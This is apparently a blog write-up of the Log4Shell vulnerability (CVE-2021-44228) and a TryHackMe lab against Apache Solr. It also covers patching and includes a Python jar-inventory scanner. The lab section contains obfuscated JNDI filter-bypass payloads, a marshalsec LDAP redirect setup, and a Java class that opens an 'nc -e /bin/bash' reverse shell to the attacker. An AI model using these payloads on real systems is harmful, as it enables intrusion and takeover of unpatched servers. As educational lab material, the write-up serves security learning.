Log4j RCE CVE-2021-44228

blackninja23
Dec 24, 2021

On December 9th, 2021, the world was made aware of a new vulnerability, CVE-2021-44228, in the Java logging library Log4j. It was given the maximum CVSS severity score of 10.0 and offers trivial, unauthenticated remote code execution against any host running software that logs attacker-controlled input through a vulnerable Log4j version. The attack has been dubbed "Log4Shell". Hence I decided to write an article about this vulnerability and work through a lab for it.

What is Log4j? Log4j is an open-source logging library used to record information from Java applications. Java runs on an estimated 3 billion devices, and Log4j is one of the most widely deployed logging libraries in that ecosystem, turning up in web servers, mobile devices, and even smart devices such as fridges.

Language? Log4j is a reliable, fast and flexible logging framework (API) written in Java and distributed under the Apache Software License. Log4j has been ported to C, C++, C#, Perl, Python, Ruby and Eiffel, but those ports are separate projects; CVE-2021-44228 affects only the Java library, specifically Log4j 2 (the log4j-core artifact).

Need to learn more about log4j? Kindly check: https://www.tutorialspoint.com/log4j/log4j_overview.htm

Affected? Apache Log4j 2 versions 2.0-beta9 through 2.14.1 are vulnerable to unauthenticated arbitrary code execution (2.15.0 shipped an incomplete fix, tracked separately as CVE-2021-45046). A remote attacker can exploit the vulnerability to run code of their choosing on the affected machine. Log4j 1.x does not contain the JNDI lookup feature and is not affected by this CVE, although it is end-of-life.

How? The vulnerability lies in Log4j's lookup (string substitution) feature, not in the LDAP protocol itself. Before writing a log message, Log4j 2 expands ${...} expressions found in it; one of the supported lookups is ${jndi:...}, which performs a Java Naming and Directory Interface (JNDI) lookup. JNDI can resolve names over LDAP, RMI and other protocols, so an attacker who gets a ${jndi:ldap://...} string into a logged message makes the application connect to an LDAP server the attacker controls, retrieve whatever it returns, and execute it locally.

To exploit the vulnerability, an attacker sends a request containing a malicious payload to the application. The crafted payload looks like this:

${jndi:ldap://attacker_controlled_website/payload_to_be_executed}

When the vulnerable Log4j logs the attacker's payload, it interprets the lookup as a JNDI resource and asks the attacker's server for it. The server can answer with a JNDI reference that points at a remote Java class file, which the application then downloads and loads, running its code. This class-loading route only works on JDKs older than 8u191, where JNDI still trusts remote LDAP codebases by default; against newer JDKs attackers instead return a serialized object that triggers a deserialization gadget already on the application's classpath.

Impact: Successful exploitation allows an attacker to execute code as the application's user and, from there, take control of the affected system.

Where to test? Anywhere the application might log user-supplied data: URL query parameters, input boxes, username and password fields on login forms, data entry points within applications, and HTTP headers such as User-Agent, X-Forwarded-For or other customizable headers.

Bypass: Filters that look for the literal string ${jndi:ldap:// are easy to evade, because Log4j resolves nested lookups such as ${lower:j}, ${upper:n}, ${env:NAME:-default} and ${::-x} (an empty variable name that falls through to its default value) before it evaluates the outer ${jndi:...} expression. Some bypasses look like this:

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}

${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}

${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}

${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://attackerendpoint.com/}

${${::-j}ndi:rmi://attackerendpoint.com/}

You can check others:

Solution: Apache has issued updates to fix vulnerable versions of Log4j. Users and administrators are encouraged to apply the necessary updates. Patch the log4j-core package to at least 2.16.0; as of this writing the recommended releases are 2.17.0 (Java 8), 2.12.3 (Java 7) and 2.3.1 (Java 6), which also close the follow-up issues. In 2.16.0, JNDI is disabled by default, support for message lookups is removed, and the incomplete-fix vulnerability CVE-2021-45046 (initially rated as a denial of service, later reclassified) is not present; 2.17.0 additionally fixes the recursive-lookup denial of service CVE-2021-45105. Where patching is not immediately possible, Apache's interim mitigation is to delete the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the jar. The widely circulated property log4j2.formatMsgNoLookups=true only works on 2.10 through 2.14.1 and was later found not to cover every code path, so upgrading or removing the class is preferred.
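As an added example (my code, not from the article or from Apache), the following Python script turns the patching advice above into an inventory check. It walks a directory tree, identifies log4j-core by its package path rather than by file name (so renamed or shaded bundles are still caught), reads Implementation-Version from the manifest, and reports whether JndiLookup.class is still inside the jar. The three sample jars it builds in a temporary directory are constructed stand-ins, not real Log4j builds; the fixed-version thresholds (2.17.0, 2.12.3, 2.3.1) are Apache's recommendations as of December 2021 and would need updating for later advisories. It does not look inside jars nested in .war or .ear files.

```python
"""Inventory log4j-core jars under a directory and classify them."""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

# The class behind the ${jndi:...} lookup; Apache's interim mitigation deletes it.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J_PKG = "org/apache/logging/log4j/core/"


def is_fixed(version: str) -> bool:
    """True if version is at or above the December 2021 fixing release of its branch."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)   # "2.0-beta9" parses as 2.0.0
    if not m:
        return False
    major, minor, patch = (int(x or 0) for x in m.groups())
    if major != 2:
        return False
    if minor == 3:                                        # Java 6 branch: 2.3.1
        return patch >= 1
    if minor == 12:                                       # Java 7 branch: 2.12.3
        return patch >= 3
    return (minor, patch) >= (17, 0)                      # main line: 2.17.0


def inspect_jar(path: str) -> Optional[Dict[str, object]]:
    """Return a report for a jar that contains log4j-core classes, else None."""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
            if not any(n.startswith(LOG4J_PKG) for n in names):
                return None
            version = None
            if "META-INF/MANIFEST.MF" in names:
                manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
                m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
                if m:
                    version = m.group(1)
    except (zipfile.BadZipFile, OSError):
        return None
    has_jndi = JNDI_CLASS in names
    if not has_jndi:
        status = "mitigated"        # JndiLookup.class was removed from the jar
    elif version is None:
        status = "unknown"          # class present, but no parsable version (e.g. shaded jar)
    elif is_fixed(version):
        status = "fixed"
    else:
        status = "vulnerable"       # below the release Apache recommended in Dec 2021
    return {"path": path, "version": version, "jndi_class": has_jndi, "status": status}


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Inspect every jar-like archive below root, sorted by path."""
    reports = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith((".jar", ".war", ".ear", ".zip")):
                report = inspect_jar(os.path.join(dirpath, name))
                if report:
                    reports.append(report)
    return sorted(reports, key=lambda r: r["path"])


def make_sample_jar(path: str, version: str, include_jndi: bool) -> None:
    """Write a constructed stand-in for log4j-core (class bodies are just a magic number)."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        zf.writestr(LOG4J_PKG + "Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo() -> Dict[str, str]:
    """Build constructed jars in a temp dir and return {file name: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1", True)
        make_sample_jar(os.path.join(tmp, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)
        make_sample_jar(os.path.join(tmp, "log4j-core-2.17.0.jar"), "2.17.0", True)
        with zipfile.ZipFile(os.path.join(tmp, "other.jar"), "w") as zf:   # unrelated jar, ignored
            zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
        return {os.path.basename(r["path"]): str(r["status"]) for r in scan_tree(tmp)}


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

On a real host, replace demo() with scan_tree("/") or the application directory and review every "vulnerable" and "unknown" entry; "unknown" usually means a fat or shaded application jar whose manifest describes the application rather than the embedded Log4j, and needs a manual look.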

LAB: Solar, exploiting log4j (TryHackMe room)

Enumeration: I won't go deep into enumeration; my aim is just to find which port runs a website and whether that site uses Java-based technology, so we can test it for Log4j.

Simple nmap scan below.

Port 8983 stands out, so a service scan of that port is worthwhile.

nmap shows that it is Apache Solr. We can google a little about it to understand it before we proceed. From Wikipedia, we learn that Solr runs on Java and is built on the Apache Lucene library.

Explore the website to find where you can test the JNDI syntax, then check whether the target calls back to your machine.

How to test?

Your machine (attacker): open a listening port so you can see whether the vulnerable machine calls back: nc -nvlp 9999

Web interface: this is where you test whether you have Log4Shell or not. I will use a curl command, since the vulnerability exists in a URL parameter. As you can see below, once I made the curl request, on the other side I was able to get a callback from the vulnerable machine.

curl 'http://10.10.207.185:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.205.131:9999\}'

The backslashes before the braces are for curl, not for the shell: curl treats {...} in a URL as a glob pattern, and \{ tells it to send a literal brace (passing -g / --globoff is the alternative). The single quotes stop the shell from expanding ${...} itself. A TCP connection arriving on port 9999 is proof that the lookup fired; nc is not an LDAP server, so the exchange goes no further than that.

So our site is vulnerable to Log4Shell. The question is: how can we turn this into remote code execution? 🤔💡

Setting up the environment:

First, make sure your attacking machine has Java installed, ideally Java 1.8.0_181 or something close to it. The version matters for two reasons: Exploit.java has to be compiled into a class file the target's JVM can load (a class compiled with a newer JDK fails on an older runtime with UnsupportedClassVersionError), and the remote-codebase class-loading trick used here only works against targets whose JDK is older than 8u191, after which JNDI refuses to load classes from an LDAP codebase by default. Second, clone and build marshalsec, which provides the malicious LDAP server:

git clone https://github.com/mbechler/marshalsec
cd marshalsec
sudo apt install maven
mvn clean package -DskipTests

Exploitation:

Start the LDAP server (marshalsec's LDAPRefServer listens on port 1389 by default). The argument is the HTTP codebase the target will be redirected to, with the class name after the #:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"

Create a Java program with your editor of choice and save it as Exploit.java. The static initializer runs the moment the target JVM loads the class, which is all we need:

public class Exploit {
    static {
        try {
            // Reverse shell to the attacker; nc -e needs a netcat build that supports -e
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9998");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Save it in the marshalsec folder and compile it with javac Exploit.java, which produces Exploit.class. Then, from that same folder, host a web server on the port you gave in the LDAP server's codebase URL (8000 in the example):

python3 -m http.server 8000

Then start another nc listener on port 9998, the port you put in Exploit.java, so you receive the shell once the LDAP reference sends the target to the web server for Exploit.class.

With everything set up, send the JNDI payload to the web interface again, this time pointing it at the LDAP server and naming the class, i.e. ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit instead of the port-9999 callback used for the test.

POC:

First: the malicious payload is passed in the URL parameter.

Second: the JNDI lookup contacts the LDAP server, which replies with a reference telling the web application to load the Exploit class from our web server.

Third: the request for Exploit.class arrives at the web server we started on port 8000, as you can see.

Fourth: then we have a shell, as you can see 😊😊😊

Thanks for reading my article.

Lab:

References:
